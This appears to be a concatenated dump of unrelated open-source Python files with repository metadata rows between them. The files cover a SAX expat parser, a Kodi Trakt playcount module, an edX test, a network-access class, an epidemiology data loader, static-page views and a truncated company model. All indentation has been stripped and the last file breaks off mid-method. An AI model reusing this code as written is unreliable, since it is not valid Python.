self.assertPublishedMany(publish_mock, metrics)
##########################################################################
if __name__ == "__main__":
unittest.main()
| mit | 4,512,097,441,752,021,500 | 30.88 | 78 | 0.549561 | false |
Orav/kbengine | kbe/src/lib/python/Lib/xml/sax/expatreader.py | 14 | 15076 | """
SAX driver for the pyexpat C module. This driver works with
pyexpat.__version__ == '2.22'.
"""
version = "0.20"
from xml.sax._exceptions import *
from xml.sax.handler import feature_validation, feature_namespaces
from xml.sax.handler import feature_namespace_prefixes
from xml.sax.handler import feature_external_ges, feature_external_pes
from xml.sax.handler import feature_string_interning
from xml.sax.handler import property_xml_string, property_interning_dict
# xml.parsers.expat does not raise ImportError in Jython
import sys
if sys.platform[:4] == "java":
raise SAXReaderNotAvailable("expat not available in Java", None)
del sys
try:
from xml.parsers import expat
except ImportError:
raise SAXReaderNotAvailable("expat not supported", None)
else:
if not hasattr(expat, "ParserCreate"):
raise SAXReaderNotAvailable("expat not supported", None)
from xml.sax import xmlreader, saxutils, handler
AttributesImpl = xmlreader.AttributesImpl
AttributesNSImpl = xmlreader.AttributesNSImpl
# If we're using a sufficiently recent version of Python, we can use
# weak references to avoid cycles between the parser and content
# handler, otherwise we'll just have to pretend.
try:
import _weakref
except ImportError:
def _mkproxy(o):
return o
else:
import weakref
_mkproxy = weakref.proxy
del weakref, _weakref
# --- ExpatLocator
class ExpatLocator(xmlreader.Locator):
"""Locator for use with the ExpatParser class.
This uses a weak reference to the parser object to avoid creating
a circular reference between the parser and the content handler.
"""
def __init__(self, parser):
self._ref = _mkproxy(parser)
def getColumnNumber(self):
parser = self._ref
if parser._parser is None:
return None
return parser._parser.ErrorColumnNumber
def getLineNumber(self):
parser = self._ref
if parser._parser is None:
return 1
return parser._parser.ErrorLineNumber
def getPublicId(self):
parser = self._ref
if parser is None:
return None
return parser._source.getPublicId()
def getSystemId(self):
parser = self._ref
if parser is None:
return None
return parser._source.getSystemId()
# --- ExpatParser
class ExpatParser(xmlreader.IncrementalParser, xmlreader.Locator):
"""SAX driver for the pyexpat C module."""
def __init__(self, namespaceHandling=0, bufsize=2**16-20):
xmlreader.IncrementalParser.__init__(self, bufsize)
self._source = xmlreader.InputSource()
self._parser = None
self._namespaces = namespaceHandling
self._lex_handler_prop = None
self._parsing = 0
self._entity_stack = []
self._external_ges = 1
self._interning = None
# XMLReader methods
def parse(self, source):
"Parse an XML document from a URL or an InputSource."
source = saxutils.prepare_input_source(source)
self._source = source
self.reset()
self._cont_handler.setDocumentLocator(ExpatLocator(self))
xmlreader.IncrementalParser.parse(self, source)
def prepareParser(self, source):
if source.getSystemId() is not None:
self._parser.SetBase(source.getSystemId())
# Redefined setContentHandler to allow changing handlers during parsing
def setContentHandler(self, handler):
xmlreader.IncrementalParser.setContentHandler(self, handler)
if self._parsing:
self._reset_cont_handler()
def getFeature(self, name):
if name == feature_namespaces:
return self._namespaces
elif name == feature_string_interning:
return self._interning is not None
elif name in (feature_validation, feature_external_pes,
feature_namespace_prefixes):
return 0
elif name == feature_external_ges:
return self._external_ges
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
if self._parsing:
raise SAXNotSupportedException("Cannot set features while parsing")
if name == feature_namespaces:
self._namespaces = state
elif name == feature_external_ges:
self._external_ges = state
elif name == feature_string_interning:
if state:
if self._interning is None:
self._interning = {}
else:
self._interning = None
elif name == feature_validation:
if state:
raise SAXNotSupportedException(
"expat does not support validation")
elif name == feature_external_pes:
if state:
raise SAXNotSupportedException(
"expat does not read external parameter entities")
elif name == feature_namespace_prefixes:
if state:
raise SAXNotSupportedException(
"expat does not report namespace prefixes")
else:
raise SAXNotRecognizedException(
"Feature '%s' not recognized" % name)
def getProperty(self, name):
if name == handler.property_lexical_handler:
return self._lex_handler_prop
elif name == property_interning_dict:
return self._interning
elif name == property_xml_string:
if self._parser:
if hasattr(self._parser, "GetInputContext"):
return self._parser.GetInputContext()
else:
raise SAXNotRecognizedException(
"This version of expat does not support getting"
" the XML string")
else:
raise SAXNotSupportedException(
"XML string cannot be returned when not parsing")
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
if name == handler.property_lexical_handler:
self._lex_handler_prop = value
if self._parsing:
self._reset_lex_handler_prop()
elif name == property_interning_dict:
self._interning = value
elif name == property_xml_string:
raise SAXNotSupportedException("Property '%s' cannot be set" %
name)
else:
raise SAXNotRecognizedException("Property '%s' not recognized" %
name)
# IncrementalParser methods
def feed(self, data, isFinal = 0):
if not self._parsing:
self.reset()
self._parsing = 1
self._cont_handler.startDocument()
try:
# The isFinal parameter is internal to the expat reader.
# If it is set to true, expat will check validity of the entire
# document. When feeding chunks, they are not normally final -
# except when invoked from close.
self._parser.Parse(data, isFinal)
except expat.error as e:
exc = SAXParseException(expat.ErrorString(e.code), e, self)
# FIXME: when to invoke error()?
self._err_handler.fatalError(exc)
def close(self):
if self._entity_stack:
# If we are completing an external entity, do nothing here
return
self.feed("", isFinal = 1)
self._cont_handler.endDocument()
self._parsing = 0
# break cycle created by expat handlers pointing to our methods
self._parser = None
bs = self._source.getByteStream()
if bs is not None:
bs.close()
def _reset_cont_handler(self):
self._parser.ProcessingInstructionHandler = \
self._cont_handler.processingInstruction
self._parser.CharacterDataHandler = self._cont_handler.characters
def _reset_lex_handler_prop(self):
lex = self._lex_handler_prop
parser = self._parser
if lex is None:
parser.CommentHandler = None
parser.StartCdataSectionHandler = None
parser.EndCdataSectionHandler = None
parser.StartDoctypeDeclHandler = None
parser.EndDoctypeDeclHandler = None
else:
parser.CommentHandler = lex.comment
parser.StartCdataSectionHandler = lex.startCDATA
parser.EndCdataSectionHandler = lex.endCDATA
parser.StartDoctypeDeclHandler = self.start_doctype_decl
parser.EndDoctypeDeclHandler = lex.endDTD
def reset(self):
if self._namespaces:
self._parser = expat.ParserCreate(self._source.getEncoding(), " ",
intern=self._interning)
self._parser.namespace_prefixes = 1
self._parser.StartElementHandler = self.start_element_ns
self._parser.EndElementHandler = self.end_element_ns
else:
self._parser = expat.ParserCreate(self._source.getEncoding(),
intern = self._interning)
self._parser.StartElementHandler = self.start_element
self._parser.EndElementHandler = self.end_element
self._reset_cont_handler()
self._parser.UnparsedEntityDeclHandler = self.unparsed_entity_decl
self._parser.NotationDeclHandler = self.notation_decl
self._parser.StartNamespaceDeclHandler = self.start_namespace_decl
self._parser.EndNamespaceDeclHandler = self.end_namespace_decl
self._decl_handler_prop = None
if self._lex_handler_prop:
self._reset_lex_handler_prop()
# self._parser.DefaultHandler =
# self._parser.DefaultHandlerExpand =
# self._parser.NotStandaloneHandler =
self._parser.ExternalEntityRefHandler = self.external_entity_ref
try:
self._parser.SkippedEntityHandler = self.skipped_entity_handler
except AttributeError:
# This pyexpat does not support SkippedEntity
pass
self._parser.SetParamEntityParsing(
expat.XML_PARAM_ENTITY_PARSING_UNLESS_STANDALONE)
self._parsing = 0
self._entity_stack = []
# Locator methods
def getColumnNumber(self):
if self._parser is None:
return None
return self._parser.ErrorColumnNumber
def getLineNumber(self):
if self._parser is None:
return 1
return self._parser.ErrorLineNumber
def getPublicId(self):
return self._source.getPublicId()
def getSystemId(self):
return self._source.getSystemId()
# event handlers
def start_element(self, name, attrs):
self._cont_handler.startElement(name, AttributesImpl(attrs))
def end_element(self, name):
self._cont_handler.endElement(name)
def start_element_ns(self, name, attrs):
pair = name.split()
if len(pair) == 1:
# no namespace
pair = (None, name)
elif len(pair) == 3:
pair = pair[0], pair[1]
else:
# default namespace
pair = tuple(pair)
newattrs = {}
qnames = {}
for (aname, value) in attrs.items():
parts = aname.split()
length = len(parts)
if length == 1:
# no namespace
qname = aname
apair = (None, aname)
elif length == 3:
qname = "%s:%s" % (parts[2], parts[1])
apair = parts[0], parts[1]
else:
# default namespace
qname = parts[1]
apair = tuple(parts)
newattrs[apair] = value
qnames[apair] = qname
self._cont_handler.startElementNS(pair, None,
AttributesNSImpl(newattrs, qnames))
def end_element_ns(self, name):
pair = name.split()
if len(pair) == 1:
pair = (None, name)
elif len(pair) == 3:
pair = pair[0], pair[1]
else:
pair = tuple(pair)
self._cont_handler.endElementNS(pair, None)
# this is not used (call directly to ContentHandler)
def processing_instruction(self, target, data):
self._cont_handler.processingInstruction(target, data)
# this is not used (call directly to ContentHandler)
def character_data(self, data):
self._cont_handler.characters(data)
def start_namespace_decl(self, prefix, uri):
self._cont_handler.startPrefixMapping(prefix, uri)
def end_namespace_decl(self, prefix):
self._cont_handler.endPrefixMapping(prefix)
def start_doctype_decl(self, name, sysid, pubid, has_internal_subset):
self._lex_handler_prop.startDTD(name, pubid, sysid)
def unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):
self._dtd_handler.unparsedEntityDecl(name, pubid, sysid, notation_name)
def notation_decl(self, name, base, sysid, pubid):
self._dtd_handler.notationDecl(name, pubid, sysid)
def external_entity_ref(self, context, base, sysid, pubid):
if not self._external_ges:
return 1
source = self._ent_handler.resolveEntity(pubid, sysid)
source = saxutils.prepare_input_source(source,
self._source.getSystemId() or
"")
self._entity_stack.append((self._parser, self._source))
self._parser = self._parser.ExternalEntityParserCreate(context)
self._source = source
try:
xmlreader.IncrementalParser.parse(self, source)
except:
return 0 # FIXME: save error info here?
(self._parser, self._source) = self._entity_stack[-1]
del self._entity_stack[-1]
return 1
def skipped_entity_handler(self, name, is_pe):
if is_pe:
# The SAX spec requires to report skipped PEs with a '%'
name = '%'+name
self._cont_handler.skippedEntity(name)
# ---
def create_parser(*args, **kwargs):
return ExpatParser(*args, **kwargs)
# ---
if __name__ == "__main__":
import xml.sax.saxutils
p = create_parser()
p.setContentHandler(xml.sax.saxutils.XMLGenerator())
p.setErrorHandler(xml.sax.ErrorHandler())
p.parse("http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xml")
| lgpl-3.0 | -5,827,036,098,280,784,000 | 34.153477 | 79 | 0.584903 | false |
tvaddonsco/tva-release-repo | leia/plugin.video.premiumizerx/resources/lib/modules/playcount.py | 4 | 14082 | import json
from resources.lib.modules import control
from resources.lib.api import trakt
from resources.lib.modules.metalibrary import playcountMeta
from resources.lib.modules import metalibrary
from resources.lib.modules.log_utils import log
def clearPlaycount():
clear = metalibrary.clearPlaycount()
if clear: control.infoDialog('Database Cleared...')
def traktscrobblePlayback(action, type, imdb = None, tvdb = None, tmdb = None, season = None, episode = None, progress = 0):
try:
if control.setting('trakt.scrobblePlayback') == 'false': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
#print(("TRAKT SCROBBLE PLAYBACK", type, imdb , tvdb, tmdb, season, episode, progress))
result = trakt.scrobblePlayback(action, type, imdb = imdb, tvdb = tvdb, tmdb = tmdb, season = season, episode = episode, progress = progress)
except:
pass
def traktPlayback(type, imdb = None, tvdb = None, tmdb = None, season = None, episode = None):
try:
if control.setting('trakt.scrobblePlayback') == 'false': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
result = trakt.returnPlayback(type, imdb = imdb, tvdb = tvdb, tmdb = tmdb, season = season, episode = episode)
return result
except:
return 0
def getMovieIndicators(refresh=False):
try:
if trakt.getTraktIndicatorsInfo() == True: raise Exception()
indicators = playcountMeta
return indicators
except:
pass
try:
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
print ("TRAKT MOVIES")
if refresh == False: timeout = 720
elif int(trakt.getWatchedActivity()) < int(trakt.timeoutsyncMovies()): timeout = 720
else: timeout = 0
print ("TRAKT TIMEOUT", timeout)
indicators = trakt.cachesyncMovies(timeout=timeout)
return indicators
except:
pass
def getTVShowTraktToLibrary():
try:
indicators = trakt.cachesyncTVShowsToLibrary()
return indicators
except:
pass
def getMovieTraktToLibrary():
try:
indicators = trakt.cachesyncMoviesToLibrary()
return indicators
except:
pass
def getTVShowIndicators(refresh=False):
try:
if trakt.getTraktIndicatorsInfo() == True: raise Exception()
indicators = playcountMeta
return indicators
except:
pass
try:
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if refresh == False: timeout = 720
elif trakt.getWatchedActivity() < trakt.timeoutsyncTVShows(): timeout = 720
else: timeout = 0
indicators = trakt.cachesyncTVShows(timeout=timeout)
return indicators
except:
pass
def getSeasonIndicators(imdb):
try:
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
indicators = trakt.syncSeason(imdb)
return indicators
except:
pass
def getMoviesOverlayLibrary(indicators, imdb):
try:
playcount = [i[2] for i in indicators if i[0] == imdb or i[1] == imdb]
playcount = playcount[0] if len(playcount) > 0 else []
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '0'
def getEpisodeOverlayLibrary(indicators, imdb, season, episode):
try:
playcount = [i[1] for i in indicators if i[0] == imdb]
playcount = playcount[0] if len(playcount) > 0 else []
playcount = [i for i in playcount if int(season) == int(i[0]) and int(episode) == int(i[1])]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '0'
# MAIN MARKINGS
def getMovieOverlay(indicators, imdb=None, tmdb=None, traktOnly=False):
try:
try: # DATABASE
#print ("GETTING MOVIE OVERLAY")
if traktOnly == True: raise Exception()
meta = {'imdb':imdb, 'tmdb': tmdb}
playcount = indicators('movie', meta)
return str(playcount)
except: # TRAKT
if imdb != None and imdb != '0':
playcount = [i for i in indicators if str(i[0]) == str(imdb)]
elif tmdb != None and tmdb != '0':
playcount = [i for i in indicators if str(i[1]) == str(tmdb)]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '6'
def getTVShowOverlay(indicators, tvdb=None, imdb=None, tmdb=None):
try:
try: # DATABASE
meta = {'imdb': imdb, 'tmdb': tmdb}
playcount = indicators('tv', meta)
return str(playcount)
except: # TRAKT
if tvdb != None and tvdb != '0':
playcount = [i for i in indicators if str(i[2]) == str(tvdb) and len(i[4]) >= int(i[3])]
elif imdb != None and imdb != '0':
playcount = [i for i in indicators if str(i[0]) == str(imdb) and len(i[4]) >= int(i[3])]
elif tmdb != None and tmdb != '0':
playcount = [i for i in indicators if str(i[1]) == str(tmdb) and len(i[4]) >= int(i[3])]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '6'
def getEpisodeOverlay(indicators, season, episode, imdb=None, tmdb=None, tvdb=None, traktOnly=False):
try:
try: # DATABASE
if traktOnly == True: raise Exception()
meta = {'imdb':imdb, 'tvdb': tvdb, 'tmdb': tmdb, 'season': season, 'episode':episode}
playcount = indicators('episode', meta)
return str(playcount)
except: # TRAKT
if tvdb != None and tvdb != '0':
playcount = [i[4] for i in indicators if str(i[2]) == str(tvdb)]
elif imdb != None and imdb != '0':
playcount = [i[4] for i in indicators if str(i[0]) == str(imdb)]
elif tmdb != None and tmdb != '0':
playcount = [i[4] for i in indicators if str(i[1]) == str(tmdb)]
#for i in indicators: #print ("INDICATOR", i[0], i[1], i[2], i[3], i[4])
playcount = playcount[0] if len(playcount) > 0 else []
playcount = [i for i in playcount if int(season) == int(i[0]) and int(episode) == int(i[1])]
playcount = 7 if len(playcount) > 0 else 6
return str(playcount)
except:
return '6'
# MAIN MARK CALLS
def markMovieDuringPlayback(watched , imdb=None, tmdb=None, refresh=False):
try:
if not control.setting('trakt.scrobbleMovies') == 'true': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7:
# AVOID DUPLICATE WATCHING
indicators = getMovieIndicators(refresh=True)
overlay = int(getMovieOverlay(indicators, imdb=imdb, tmdb=tmdb, traktOnly=True))
if overlay == 7: raise Exception()
trakt.markMovieAsWatched(imdb=imdb, tmdb=tmdb)
else:
trakt.markMovieAsNotWatched(imdb=imdb, tmdb=tmdb)
trakt.cachesyncMovies()
except:
pass
try:
type = 'movie'
action = str(watched)
meta = {'imdb': imdb, 'tmdb': tmdb}
playcountMeta(type, meta, action)
except:
pass
if refresh== True: control.refresh()
def markEpisodeDuringPlayback(season, episode, watched, imdb=None, tmdb=None, tvdb=None, refresh=False):
try:
if not control.setting('trakt.scrobbleTV') == 'true': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7:
# AVOID WATCHING DUPLICATES
indicators = getTVShowIndicators(refresh=True)
overlay = int(getEpisodeOverlay(indicators, season, episode, imdb=imdb, tmdb=tmdb, tvdb=tvdb, traktOnly=True))
if overlay == 7: raise Exception()
trakt.markEpisodeAsWatched(season, episode, imdb=imdb, tmdb=tmdb, tvdb=tvdb)
else: trakt.markEpisodeAsNotWatched(season, episode, imdb=imdb, tmdb=tmdb, tvdb=tvdb)
trakt.cachesyncTVShows()
except:
pass
try:
meta = {'imdb':imdb, 'tvdb':tvdb, 'tmdb': tmdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
except:
pass
if refresh== True: control.refresh()
def movies(watched, imdb=None, tmdb=None):
try:
if not control.setting('trakt.scrobbleMovies') == 'true': raise Exception()
print("trakt indicators")
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7: trakt.markMovieAsWatched(imdb=imdb, tmdb=tmdb)
else: trakt.markMovieAsNotWatched(imdb=imdb, tmdb=tmdb)
trakt.cachesyncMovies()
except:
pass
try:
type = 'movie'
action = str(watched)
meta = {'imdb': imdb, 'tmdb': tmdb}
playcountMeta(type, meta, action)
except:
pass
def episodes(season, episode, watched, imdb=None, tvdb=None, tmdb=None):
try:
if not control.setting('trakt.scrobbleTV') == 'true': raise Exception()
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if int(watched) == 7: trakt.markEpisodeAsWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else: trakt.markEpisodeAsNotWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
trakt.cachesyncTVShows()
except:
pass
try:
meta = {'imdb':imdb, 'tvdb':tvdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
except:
pass
def tvshows(tvshowtitle, season, watched, imdb=None, tvdb=None, tmdb=None):
# #### seasonID 0 is Full Tv Show #####
SeasonID = str(season)
try:
import sys,xbmc
name = control.addonInfo('name')
dialog = control.progressDialogBG
dialog.create(str(name), str(tvshowtitle))
dialog.update(0, str(name), str(tvshowtitle))
from resources.lib.indexers import episodes
year = ''
library = episodes.episodes().getLibrary(tvshowtitle, year, imdb, tvdb, idx=True)
if SeasonID == '0':
metaShow = {'imdb':imdb, 'tvdb':tvdb}
playcountMeta('tv', metaShow, str(watched))
try: items = [i for i in library]
except: pass
items = [{'season': int('%01d' % int(i['season'])), 'episode': int('%01d' % int(i['episode']))} for i in items]
for i in range(len(items)):
if xbmc.abortRequested == True: return sys.exit()
season, episode = items[i]['season'], items[i]['episode']
dialog.update(int((100 / float(len(items))) * i), 'Setting MetaData', 'Season: ' + str(season) + ' Episode: ' + str(episode))
meta = {'imdb':imdb, 'tvdb':tvdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
else:
try: items = [i for i in library if int('%01d' % int(season)) == int('%01d' % int(i['season']))]
except: pass
items = [{'season': int('%01d' % int(i['season'])), 'episode': int('%01d' % int(i['episode']))} for i in items]
for i in range(len(items)):
if xbmc.abortRequested == True: return sys.exit()
season, episode = items[i]['season'], items[i]['episode']
dialog.update(int((100 / float(len(items))) * i), 'Setting MetaData', 'Season: ' + str(season) + ' Episode: ' + str(episode))
meta = {'imdb':imdb, 'tvdb':tvdb, 'season':season, 'episode':episode}
playcountMeta('episode', meta, str(watched))
try: dialog.close()
except: pass
except:
try: dialog.close()
except: pass
try:
name = control.addonInfo('name')
dialog = control.progressDialogBG
dialog.create(str(name), str(tvshowtitle))
dialog.update(0, str(name), str(tvshowtitle))
if trakt.getTraktIndicatorsInfo() == False: raise Exception()
if not control.setting('trakt.scrobbleTV') == 'true': raise Exception()
if SeasonID == '0':
year = ''
for i in range(len(library)):
season, episode = items[i]['season'], items[i]['episode']
dialog.update(int((100 / float(len(items))) * i), 'TRAKT Watch Status', 'Season: ' + str(season) + ' Episode: ' + str(episode))
if int(watched) == 7: trakt.markEpisodeAsWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else: trakt.markEpisodeAsNotWatched(season, episode, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else:
year = ''
items = [(int(i['season']), int(i['episode'])) for i in library]
items = [i[1] for i in items if int('%01d' % int(season)) == int('%01d' % i[0])]
for i in items:
dialog.update(int((100 / float(len(items))) * i), 'TRAKT Watch Status', 'Season: ' + str(season) + ' Episode: ' + str(i))
if int(watched) == 7: trakt.markEpisodeAsWatched(season, i, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
else: trakt.markEpisodeAsNotWatched(season, i, tvdb=tvdb, imdb=imdb, tmdb=tmdb)
try: dialog.close()
except: pass
trakt.cachesyncTVShows()
except:
pass
# control.refresh()
| gpl-3.0 | 4,708,284,172,765,423,000 | 37.335196 | 149 | 0.56732 | false |
Edraak/edraak-platform | lms/djangoapps/shoppingcart/management/tests/test_retire_order.py | 13 | 2868 | """Tests for the retire_order command"""
from tempfile import NamedTemporaryFile
from django.core.management import call_command
from course_modes.models import CourseMode
from shoppingcart.models import CertificateItem, Order
from student.tests.factories import UserFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
class TestRetireOrder(ModuleStoreTestCase):
"""Test the retire_order command"""
shard = 4
def setUp(self):
super(TestRetireOrder, self).setUp()
course = CourseFactory.create()
self.course_key = course.id
CourseMode.objects.create(
course_id=self.course_key,
mode_slug=CourseMode.HONOR,
mode_display_name=CourseMode.HONOR
)
# set up test carts
self.cart, __ = self._create_cart()
self.paying, __ = self._create_cart()
self.paying.start_purchase()
self.already_defunct_cart, __ = self._create_cart()
self.already_defunct_cart.retire()
self.purchased, self.purchased_item = self._create_cart()
self.purchased.status = "purchased"
self.purchased.save()
self.purchased_item.status = "purchased"
self.purchased.save()
def test_retire_order(self):
"""Test the retire_order command"""
nonexistent_id = max(order.id for order in Order.objects.all()) + 1
order_ids = [
self.cart.id,
self.paying.id,
self.already_defunct_cart.id,
self.purchased.id,
nonexistent_id
]
self._create_tempfile_and_call_command(order_ids)
self.assertEqual(
Order.objects.get(id=self.cart.id).status, "defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.paying.id).status, "defunct-paying"
)
self.assertEqual(
Order.objects.get(id=self.already_defunct_cart.id).status,
"defunct-cart"
)
self.assertEqual(
Order.objects.get(id=self.purchased.id).status, "purchased"
)
def _create_tempfile_and_call_command(self, order_ids):
"""
Takes a list of order_ids, writes them to a tempfile, and then runs the
"retire_order" command on the tempfile
"""
with NamedTemporaryFile() as temp:
temp.write("\n".join(str(order_id) for order_id in order_ids))
temp.seek(0)
call_command('retire_order', temp.name)
def _create_cart(self):
"""Creates a cart and adds a CertificateItem to it"""
cart = Order.get_cart_for_user(UserFactory.create())
item = CertificateItem.add_to_order(
cart, self.course_key, 10, 'honor', currency='usd'
)
return cart, item
| agpl-3.0 | -483,587,724,983,874,000 | 31.965517 | 79 | 0.620293 | false |
ganeshgore/myremolab | server/src/voodoo/gen/coordinator/Access.py | 2 | 2950 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <[email protected]>
#
from abc import ABCMeta, abstractmethod
import voodoo.gen.exceptions.coordinator.AccessErrors as AccessErrors
import voodoo.gen.coordinator.Address as Address
class Access(object):
"""A CoordServer will have different "Access"es. For example, a Server can have an Access for
"Direct connections" (with protocol = Direct), and an Access for SOAP, and inside this Access,
it could have different "SOAPNetwork"s. For example, it could have 2 different networks, one
with address '192.168.0.1:8080@Network1' and another with address '130.206.136.137:8080@Network2'. The
Direct or machine access would have one network with a CoordAddress address.
Right now we don't have any MachineNetwork available, since we don't have any IPC protocol available such
as dbus.
"""
def __init__(self, protocol, access_level, networks):
self.protocol = protocol
self.access_level = access_level
self.networks = list(networks)
def possible_connections(self,other):
if other.access_level != self.access_level or other.protocol != self.protocol:
return []
#Now, let's check networks
return_value = []
for i in self.networks:
for j in i.check(other):
return_value.append(j)
return return_value
class Network(object):
__metaclass__ = ABCMeta
def __init__(self, address):
if not isinstance(address,Address.Address):
raise AccessErrors.AccessNotAnAddressError("Not an Address: %s" % address)
self.address = address
@abstractmethod
def check(self,other):
""" check(self,other) -> [Network1,...]
Given this network and an instance of Access called "other",
check will return a list of networks of "other" which are
interoperable with this network
"""
@abstractmethod
def get_protocol(self):
""" get_protocol(self) -> protocol_module
Given this network, it will return the module of the protocol
(SOAP,Direct, and so on).
"""
class IpBasedNetwork(Network):
def __init__(self,address):
""" Address will have this format: 'IP:PORT@NETWORK_NAME' """
if not isinstance(address,Address.IpBasedAddress):
raise AccessErrors.AccessNotAnIpAddressError("Not an IpBasedAddress: %s" % address)
Network.__init__(self,address)
def check(self,other):
return [ i for i in other.networks
if isinstance(i,IpBasedNetwork) and self.address._net_name == i.address._net_name ]
| bsd-2-clause | 581,917,420,640,148,000 | 34.963415 | 109 | 0.67277 | false |
AugustC/project-epidemio | src/dataset.py | 1 | 2112 | # -*- coding: latin-1 -*-
import pandas as pd
import numpy as np
first_year = 2000
last_year = 2013
def read_raw_input(filename):
# Receive the raw input from filename.csv and return the panda time series
dataset = pd.read_csv(filename, sep=';', encoding='latin-1')
labels = dataset.keys()
city_label = labels[0]
cities = dataset[city_label]
weeks_str = labels[1:]
weeks_int = weeks_str.map(int)
years = np.unique(np.floor(weeks_int/100))
matrix = np.empty((0, 52))
tuples_cityear = []
for cityI in range(len(cities)):
for year in years:
tuples_cityear.append((cities[cityI],str(int(year)))) # index
notified = []
for week in weeks_int:
if (week >= year * 100 and week < (year + 1) * 100):
notified.append(dataset.get_value(cityI, str(week)))
if len(notified) > 52:
notified = notified[:52] # limit the amount of weeks in a year to 52
matrix = np.vstack((matrix, notified))
index = pd.MultiIndex.from_tuples(tuples_cityear, names=['Cidade', 'Ano'])
series = pd.DataFrame(matrix, index=index)
series = series.T.unstack()
return series
def read_frequency_input(filename):
# Receive the frequency input from filename.csv and return the panda time series
df = pd.read_csv(filename, sep=';')
dataset = df.set_index(["Cidade", "Ano"])
series = dataset.T.unstack()
return series
def read_population(filename):
# Receive the file with the cities and number of inhabitants
d = {}
with open(filename, encoding="latin-1") as f:
for line in f:
(key, val) = line.split(";")
d[key] = int(val)
return d
def weight_population(dataset, population):
# Function that receives a dataset of the disease and the population of each city
# and returns a disease frequency series, weighted by the population of each city
cities = dataset.index.levels[0]
for city in cities:
dataset.T[city] = dataset.T[city]/population[city]
return dataset
| mit | -2,772,738,059,270,581,000 | 34.2 | 85 | 0.624053 | false |
ehsan/airmozilla | airmozilla/staticpages/views.py | 10 | 2987 | # Adapted from django.contrib.flatpages.middleware
from django.conf import settings
from django.http import Http404, HttpResponse, HttpResponsePermanentRedirect
from django.shortcuts import get_object_or_404, render
from django.template import loader, RequestContext, Template
from django.utils.safestring import mark_safe
from airmozilla.main.models import Event
from .models import StaticPage
DEFAULT_TEMPLATE = 'staticpages/default.html'
def staticpage(request, url):
if not url.startswith('/'):
url = '/' + url
try:
f = get_object_or_404(StaticPage, url__exact=url)
except Http404:
if not url.endswith('/') and settings.APPEND_SLASH:
url += '/'
f = get_object_or_404(StaticPage, url__exact=url)
return HttpResponsePermanentRedirect('%s/' % request.path)
else:
raise
return render_staticpage(request, f)
def render_staticpage(request, staticpage):
if not can_view_staticpage(staticpage, request.user):
# We might need to kick you out if you're not allowed to see this.
response = render(
request,
'staticpages/insufficient_privileges.html', {
'staticpage': staticpage,
},
status=403,
)
return response
if staticpage.template_name:
t = loader.select_template(
(staticpage.template_name, DEFAULT_TEMPLATE)
)
else:
t = loader.get_template(DEFAULT_TEMPLATE)
if staticpage.allow_querystring_variables:
title_t = Template(staticpage.title)
content_t = Template(staticpage.content)
params = {}
for key, value in request.REQUEST.items():
if key.startswith('request'):
continue
params[key] = value
context = RequestContext(request, params)
staticpage.title = title_t.render(context)
staticpage.content = content_t.render(context)
else:
# To avoid having to always use the "|safe" filter in flatpage
# templates, mark the title and content as already safe (since
# they are raw HTML content in the first place).
staticpage.title = mark_safe(staticpage.title)
staticpage.content = mark_safe(staticpage.content)
c = RequestContext(request, {
'staticpage': staticpage,
})
response = HttpResponse(t.render(c))
for key, value in staticpage.headers.items():
response[key] = value
# print repr(staticpage.headers)
# if staticpage.cors_header:
# response['Access-Control-Allow-Origin'] = staticpage.cors_header
return response
def can_view_staticpage(page, user):
if page.privacy == Event.PRIVACY_PUBLIC:
return True
if not user.is_active:
return False
from airmozilla.main.views import is_contributor
if page.privacy == Event.PRIVACY_COMPANY:
if is_contributor(user):
return False
return True
| bsd-3-clause | -160,157,908,733,099,840 | 31.467391 | 76 | 0.646803 | false |
iw3hxn/LibrERP | core_extended/models/company.py | 1 | 1654 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Author: Didotech SRL
# Copyright 2014 Didotech SRL
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class res_company(orm.Model):
_inherit = 'res.company'
def write(self, cr, uid, ids, values, context=None):
if not ids:
return False
if isinstance(ids, (int, long)):
ids = [ids]
res = super(res_company, self).write(cr, uid, ids, values, context=context)
if values.get('currency_id', False):
